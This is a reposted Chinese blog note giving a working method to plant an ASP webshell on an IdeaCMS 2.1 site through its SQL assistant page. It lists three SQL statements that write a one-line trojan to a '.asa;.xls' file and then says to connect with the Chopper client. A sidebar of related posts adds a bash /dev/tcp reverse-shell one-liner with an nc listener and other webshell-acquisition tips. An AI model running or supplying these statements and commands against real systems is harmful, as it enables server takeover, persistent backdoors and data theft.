利用SQL高级助手获取webshell

最新推荐文章于 2019-09-22 10:25:00 发布
最新推荐文章于 2019-09-22 10:25:00 发布
阅读量140 收藏
点赞数
原文链接:http://www.cnblogs.com/Kerne0/p/5173802.html
版权

随笔目的:只是为了自己,记录一下这个方法(非原创)而已。

测试系统:win2003+iis6.0+IdeaCMS 2.1

目标网站IP,物理路径如下图:

利用页面如下:

在输入框中依次输入下列三条语句即可:

1.  create table test(a varchar(50))#建立一个表test,其中含一个可变字段a

2.  insert into test(a) values ('<%execute request(chr(49))%>')#向表test中插入一条记录,值是一句话木马

3.  select * into [a] in 'C:\WWW\test.asa;.xls' 'excel 4.0;' from test;#表复制语句

#语句形式为:SELECT vale1, value2 into Table2 from Table1

#要求目标表Table2不存在,因为在插入时会自动创建表Table2,并将Table1中指定字段数据复制到Table2中。

执行无误后,用菜刀连接即可。

 

转载于:https://www.cnblogs.com/Kerne0/p/5173802.html

diaotuanao1650
关注
〖Python 数据库开发实战 - Python与MySQL交互篇②〗- SQL 注入攻击案例
易编橙 · 终身成长社群,相遇已是上上签!
08-22 4万+
上一章节,我们只是简单的了解了 MySQL Connector 的语法,完成了一个简单的案例。Python 语言操作数据库不是到这里就结束了后续还有很多高级的内容等着我们去学习,该章节我们就来学习一下对所有数据库都有效的 "SQL 注入攻击" 。
WebShell通过SQL语句管理MSSQL
chengjingdeni的专栏
08-07 491
<br />   最近在做一个网络安全相关项目的渗透测试,在拿到了服务器的webshell之后,需要进一步渗透,服务器上有较高权限的软件只剩SQL Server 2005了,而且在webshell中通过SQL Server 2005提权拿到系统权限,由于拿到webshell的服务器在内网,通过防火墙做了端口映射,无法直接使用SQL Server管理工具进行管理,就需要通过webshell执行SQL 语句来操作SQL Server数据库,其中用到了一些非常规的SQL语句,列举一些sql语句来介绍数据库,数据表
通过mysql获取php webshell
weixin_34092455的博客
09-28 218
2019独角兽企业重金招聘Python工程师标准>>> ...
SQL Assistant 5.0.97 注册码 破解文件
05-04
SQL Assistant是一款数据库开发辅助软件,能够帮助数据库开发人员加快开发过程,提高代码质量和准确度。 这是到目前为止最新版本,之前版本的注册码到此版本无效! 此下载包含有最新版本注册码
SQL 语法提示工具[SQL助手SQL Assistant] 很实用的,吐血推荐 [附带下载]
热门推荐
Gavin luo 我们共同努力
11-25 1万+
SQL 语法提示工具  SQL助手SQL Assistant 这是前几天去上海看老大用的一个软件这个工具在我的资源里面有下载的这个工具很简单,很实用,可以帮助写SQL的朋友有语法提示功能 ,而且还是支持多数据库的。以下这个是配置界面,可以看出支持多数据库的。   这个是在查询分析器里面的截图,他可以自动提示语法,非常的方便,而且还带记忆功能,可以记住你所执行过的SQL
一套实用的***测试岗位面试题,你会吗?
weixin_33827731的博客
04-11 1732
本文内容大部分转载自Mrxn's Blog,仅作少部分修改。1.拿到一个待检测的站,你觉得应该先做什么?收集信息whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说...2.mysql的网站注入,5.0以上和5.0以下有什么区别?5.0以下没有information_schema这个系统表,无法列表名等,只能...
Google Hacking与SQL注入实战:寻找Webshell
SQL注入则是攻击者通过输入恶意的SQL代码,以获取未经授权的数据访问或者控制系统的一种常见攻击手段。" **Google Hacking技术** Google Hacking是一种高级的搜索引擎利用技巧,通过特定的搜索语法,可以在Google...
利用抓包拿WEBSHELL
05-06
在网络安全领域,"利用抓包拿WEBSHELL"是一个高级技术话题,涉及到网络通信的监控、数据包分析以及Web安全漏洞的利用。本教程旨在帮助你理解这一过程,但请注意,此类活动仅限于合法的学术研究和安全测试,不能用于...
[基础架构安全]高级攻防演练下的Webshell.zip
11-04
勒索软件常常与Webshell结合使用,攻击者先利用Webshell获取服务器控制权,然后部署勒索软件加密服务器上的数据,要求受害者支付赎金以解锁。了解勒索软件的工作机制,包括加密算法、传播途径和赎金支付方式,对于...
SQLmap使用指南:数据库提权与Webshell获取
"SQLmap是一种强大的SQL注入工具,用于自动化检测和利用SQL注入漏洞。它不仅可以进行渗透测试,还能执行操作系统命令、读写文件、提升权限等操作。本文将详细讨论SQLmap在获取Webshell和系统权限方面的能力和常用...
SQL注入得到WEBSHELL
11-15 1033
一.通过SQL注入得到WEBSHELL的原理: N.E.V.E.R的方法:利用数据库备份得到WEBSHELL。创建一个表,在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来,最后再删除新建的表。 分析: N.E.V.E.R利用了MSSQL的备份数据库功能。把数据导出来,设想数据库中有之类的ASP标实符,导出文件,文件名以.ASP的形式保存。然后文件又保存在WEB
利用Mysql root帐号获取某Linux操作系统网站webshell
weixin_44023460的博客
12-08 2558
利用Mysql root帐号获取某Linux操作系统网站webshell simeon 获取Webshell,网上有很多文章,本文是phpMyAdmin漏洞利用与防范专题中的一个研究课题,其主要环境是在有Mysql数据库root帐号密码权限的基础下,如何通过技术手段获取Linux操作系统上建立的网站系统的webshell权限。 1.漏洞利用思路 1.1Mysql root帐号密码获取思路 (1)通...
MSF——Meterpreter(三)
dishan4749253的博客
09-09 646
MSF系列: MSF——基本使用和Exploit模块(一) MSF——Payload模块(二) MSF——Meterpreter(三) MSF——信息收集(四) 一、简介 Meterpreter是Metasploit提供的一个非常强大的后渗透工具 Meterpreter可以看成特殊的Payload,之前我们的Payload都是为了获得目标系统的shell 这里...
渗透之路 思路【第一篇】get webshell总结
dfu65065的博客
09-22 530
CMS获取Webshell方法 主要通过百度搜索CMS网站程序名称。如:phpcms拿Webshell、WordPress后台拿Webshell等 非CMS获取Webshell方法 1、数据库备份获取Webshell 原理:后台文件重命名(e.g xxx.jpg-> xxx.asp) 2、抓包上传获取Webshell 文件上传 3、Sql命令获取We...
获取webshell方法
qq_34304107的博客
04-11 2223
一、CMS获取webshell方法百度、googel二、非CMS获取webshell 1、数据库备份获取webshell2、抓包上传获取webshell3、SQL命令获取webshell4、模板修改获取webshell5、插入一句话获取webshell6、修改上传类型获取webshell三、其他方式1、PHPMyadmin 获取webshell2、Tomcat获取webshell3、weblogi...
多种姿势反弹shell
Brucetg的博客
08-20 7166
在渗透过程中,在拿到webshell后,如果目标主机是Linux服务器,一般我们都会选择反弹shell以方便后续操作,在此总结下反弹shell的几种姿势。 0x01. Bash反弹 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i &amp;gt;&amp;amp; /dev/tcp/x.x.x.x/port 0&amp;gt;&amp;amp;1 简单解释下: bash ...
Linux下查找Webshell挂马文件记录
大鹏
08-20 4569
服务器上被上传了webshell 肯定能够查到蛛丝马迹, 比如php文件的时间,如果我们可以查找最后一次网站代码更新以后的所有php文件 方法如下: 假设最后更新是10天前我们可以查找10天内生成的可以php文件: find /var/www/ -name “*.php” -mtime -10 也可以通过关键字的形式查找 常见的木马常用代码函数 eval,shell_ex
提权学习 -- 使用 mysql 拿到 webshell
LuckyToMeet-Dian叶
06-14 897
注意 如造成一切损失,与本人无关! 工具准备 scanPort 端口扫描工具,用于扫描内网中开放的端口。 dirBuster 网站目录扫描工具,用于扫描网站的目录已经 URL,暴力破解方式,可能会把服务器弄崩(电脑不咋地的情况)。 提权前提 对方需要开启服务器,且需要知道服务器在宿主机上的绝对路径 知道其 mysql 用户名和密码 mysql 有读写权限,可以向服务器开放目录写木马文件。 有上...
2018-2019-2 20189215 《网络攻防技术》第七周作业
weixin_30511107的博客
04-13 236
教材《网络攻防技术》第七章学习 第7章 Windows操作系统安全攻防 7.1 Windows操作系统基本框架概述 windows基本结构分为运行于处理器特权模式的操作系统内核以及运行在处理器非特权模式的用户,即为内核态和用户态。 内核态:windows执行体、windows内核体、设备驱动程序、硬件抽象层、windows窗口与图形界面接口。 用户态:系统支持进程、环境子系统服务进程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值